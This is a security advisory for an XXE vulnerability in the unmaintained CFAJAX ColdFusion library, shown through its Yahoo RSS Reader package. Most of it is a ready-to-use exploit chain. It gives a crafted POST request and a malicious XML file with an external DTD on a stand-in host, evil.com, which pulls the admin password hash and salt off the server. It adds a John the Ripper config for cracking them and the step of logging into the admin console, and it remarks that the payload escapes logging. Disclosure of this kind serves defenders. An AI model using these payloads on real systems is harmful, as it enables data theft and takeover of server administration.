SSD Advisory – Yahoo RSS Reader XXE Vulnerability (CFAJAX)

Vulnerability Description
A vulnerability in the way CFAJAX handles incoming requests allows attackers to cause the program to execute arbitrary code. The vulnerability is present in a few packages that CFAJAX provides, below is an example of exploitation of this vulnerability in Yahoo RSS Reader. The vulnerability is not limited to this software, but to any software that uses CFAJAX.
Unfortunately CFAJAX is no longer maintained (last version came out on Nov 21st 2005), emails sent to the author go unanswered, but it is still found in several web sites we found on the Internet.
Technical Details
The vulnerability is exploited by supplying an XML file to the CFAJAX written program which is vulnerable to an XXE. The XXE vulnerability allows us to read locally stored files, in our example neo-security.xml and password.properties, which we can then crack (through bruteforce) to gain the administrative panel of Coldfusion.
Exploit
1. Send one HTTP POST request to a vulnerable server. Exploit data will not be logged (by default POST request’s payloads don’t get logged), only the URL being accessed.

POST /ajax/app/yahoo/functions.cfm?null.yahooGroupRssFeedReader HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388
Version/12.17
Host: localhost
Content-Length: 213
Content-Type: application/x-www-form-urlencoded
ajax=true&clientAuthenticationKey=&callCount=1&c0-scriptName=null&c0-methodName=yahooGroupRssFeedReader&c0-id=8176_1433507473868&c0-param0=string:http://evil.com/cf-92655311.xml&c0-param1=number:10&xml=true&

2. Content of cf-92655311.xml listed below:

<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE rss [
<!ENTITY % xxe-hash SYSTEM
"file:///ColdFusion11/cfusion/lib/neo-security.xml">
<!ENTITY % xxe-salt SYSTEM
"file:///ColdFusion11/cfusion/lib/password.properties">
<!ENTITY % end "]]>" >
<!ENTITY % start "<![CDATA[" >
<!ENTITY % dtd SYSTEM "http://evil.com/cdata-xxe.dtd">
%dtd;
]>
<rss version="2.0">
  <channel>
    <title>T</title>
    <link>L</link>
    <description>D</description>
    <item>
      <title>TT</title>
      <link>LL</link>
      <description>&all;</description>
    </item>
  </channel>
</rss>

3. Content of cdata-xxe.dtd listed below:

<!ENTITY all "%start;%xxe-hash;%xxe-salt;%end;">

4. You should receive a response like this:

HTTP/1.1 200 OK
Date: Fri, 18 Sep 2015 16:05:02 GMT
Server: nginx
Content-Type: text/html;charset=UTF-8
Content-Length: 1767
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Sat, 01 Jan 2005 05:00:00 GMT
X-Powered-By: ASP.NET
Set-Cookie: CFID=201800; Expires=Sun, 10-Sep-2045 16:05:02 GMT; Path=/;
HttpOnly
Set-Cookie: CFTOKEN=; Expires=Sun, 10-Sep-2045 16:05:02 GMT; Path=/;
HttpOnly
Vary: Accept-Encoding
****/
var _8176_123123123 = null;
_8176_123123123213 = [
{ AUTHOR:' ',DESCRIPTION:' <wddxPacket
version=\'1.0\'><header/><data><struct
type=\'coldfusion.server.ConfigMap\'><var
name=\'admin.userid.root\'><string>admin</string></var><var
name=\'rds.security.enabled\'><string>true</string></var><var
name=\'rds.security.usesinglerdspassword\'><boolean
value=\'true\'/></var><var name=\'allowconcurrentadminlogin\'><boolean
value=\'true\'/></var><var name=\'admin.userid.required\'><boolean
value=\'false\'/></var><var
name=\'allowedAdminIPList\'><string></string></var><var
name=\'secureprofile.enabled\'><boolean value=\'false\'/></var><var
name=\'CrossSiteScriptPatterns\'><struct
type=\'coldfusion.server.ConfigMap\'><var
name=\'&lt;\\s*(object|embed|script|applet|meta)\'><string>&lt;InvalidTag</string></var></struct></var><var
name=\'contexts\'><struct type=\'coldfusion.server.ConfigMap\'><var
name=\'/\'><struct
type=\'coldfusion.server.ConfigMap\'></struct></var></struct></var><var
name=\'rds.enabled\'><string>false</string></var><var
name=\'sbs.security.enabled\'><boolean value=\'false\'/></var><var
name=\'admin.userid.root.salt\'><string>PASSWORDSALTHERE</string></var><var
name=\'admin.security.enabled\'><boolean value=\'true\'/></var><var
name=\'AuthorizedUsers\'><struct
type=\'coldfusion.util.FastHashtable\'></struct></var></struct></data></wddxPacket>\n#Tue
Sep 30 05:34:21 PDT
2014\nrdspassword=\npassword=PASSWORDHASHHERE\nencrypted=true\n ',LINK:'
--3-- ',PUBDATE:' ',PUBTIME:' ',TITLE:' --2-- ' }
]
DWREngine._handleResponse('8176_12312312323', _8176_123123123123,
true, true, true);
/* EOF CFAJAX */

4. Extract salt and password values:

admin.userid.root.salt\'><string>...
and
\npassword=...

5. Now that you have the salt and password. You can crack the password by following these instructions:
Hash is password variable from ./lib/password.properties.
Salt is admin.userid.root.salt variable from ./lib/neo-security.xml
Configuration file for John the Ripper:

[List.Generic:dynamic_1588]
Expression=sha256($salt.sha1($pass)) (ColdFusion 11)
Flag=MGF_INPUT_32_BYTE
Flag=MGF_SALTED
Flag=MGF_FLAT_BUFFERS
Flag=MGF_BASE_16_OUTPUT_UPCASE
Func=DynamicFunc__clean_input_kwik
Func=DynamicFunc__clean_input2_kwik
Func=DynamicFunc__append_salt
Func=DynamicFunc__append_keys2
Func=DynamicFunc__SHA1_crypt_input2_append_input1
Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
Test=$dynamic_1503$37F816D599BFD69C5A0D750198AB6E46E26CEB120C9AF3B1E5306515058CBAE8$D7B6D57262290BC0A634D2D1A0DFE59F1FBE47885DBC9BB1CEBA8EA9D09D9839:test1234

6. Recover password and go to admin console (/CFIDE URL)

?

Get in touch